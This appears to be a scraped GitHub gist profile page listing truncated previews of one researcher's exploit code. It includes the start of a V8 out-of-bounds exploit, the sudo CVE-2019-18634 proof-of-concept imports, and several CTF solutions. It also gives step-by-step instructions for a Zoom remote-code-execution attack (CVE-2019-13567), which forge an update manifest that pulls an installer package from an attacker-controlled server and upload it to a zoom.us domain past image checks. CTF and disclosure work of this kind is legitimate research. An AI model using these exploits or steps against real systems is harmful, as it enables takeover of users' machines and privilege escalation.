Skip to content

Instantly share code, notes, and snippets.

View wbowling's full-sized avatar

William Bowling wbowling

298 followers · 3 following
View GitHub Profile
@wbowling
wbowling / pwn.js
Last active April 20, 2021 21:42
starCTF (*CTF) 2019 oob-v8
// uses https://github.com/saelo/jscpwn/blob/master/utils.js
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,104,101,108,108,111,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,16,11,11,146,128,128,128,0,1,0,65,16,11,12,72,101,108,108,111,32,87,111,114,108,100,0]);
let wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), {});
let f = wasm_mod.exports.hello;
var arr1 = [1.1];
var arr2 = [Date];
var arr_map1 = arr1.oob();
var arr_map2 = arr2.oob();
@wbowling
wbowling / README.md
Last active January 1, 2022 22:33
Zoom RCE - CVE-2019-13567

POC - https://youtu.be/zGSLBDo3N7s

  1. Create a malicious update manifest with the Package-url pointing a server you control:
Check-sum=11111111111111111111111111111111;Check2-sum=11111111111111111111111111111111;Update-Option=1;Current-version=5.4.53932.0709;Download-root=https://aw.rs/z;Package-url=https://aw.rs/z/5.4.53932.0709/zoomusInstaller.pkg?t=atupg;Package-name=zoomusInstaller.pkg;Installer-name=;ahcab-name=airhost.zip;sipcab-name=sipcall.zip;codesnippet-name=codesnippet_mac.zip;fullcab-name=zoomusInstallerFull.pkg;
  1. Upload the manifest it to a .zoom.us domain, one example is as the icon for a new https://marketplace.zoom.us/ app (there are client side checks to see if it's an image but they can be bypassed): https://marketplacecontent.zoom.us//sMLaMgPKSw2SAfIfpYV1Eg/zqJOtwryQkyO_UMykn2OdA/app/4yr1OelsSIGCMOj5CvI1JQ/ZAS3dFjlS8W0jJt48Dy9fA.jpg
@wbowling
wbowling / test
Created July 30, 2019 00:52
test
@wbowling
wbowling / CVE-2019-18634.py
Last active September 8, 2020 23:03
POC for CVE-2019-18634
#!/usr/bin/python
import os
import pty
from pwn import process, sleep, write, read, listen, p64
"""
From https://github.com/sudo-project/sudo/blob/SUDO_1_8_30/src/tgetpass.c#L401:
} else if (c == sudo_term_kill) {
@wbowling
wbowling / nativity_scene.js
Created May 11, 2020 14:13
Nativity Scene from SpamAndFlags CTF 2020
let oob, oob_rw, base;
function setup() {
oob = new Uint8Array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14]);
oob_rw = new BigUint64Array([
0x1111111122222222n,
0x1111111122222222n,
0x1111111122222222n,
]);
@wbowling
wbowling / amp2020.py
Last active June 29, 2020 04:12
Solution to amp2020 from 0CTF/TCTF 2020 Quals
#!/usr/bin/env python
from pwn import *
import requests
import string
"""
* can add arbitrary html and pass the validator by adding a tag comment inside the <noscript> and close it
* axios uses `input` directly and we can make it an object allowing full param control
* cheerio needs a string, but axios tries to return the response as json. If you add `爀` and set the `responseEncoding` to `ascii` the json parsing fails and it returns text
@wbowling
wbowling / decrypt.py
Last active October 1, 2021 17:13
Decryptor for signalino - Midnight Sun CTF 2021
#!/usr/bin/env python3
"""
Based on https://github.com/xperylabhub/ios_keychain_decrypter/blob/d7f3089067816cd2adc1ce910c9e1b927a356f37/keychain_decrypt.py#L113
"""
import plistlib
from bpylist import archiver, archive_types
import dataclasses
from Crypto.Cipher import AES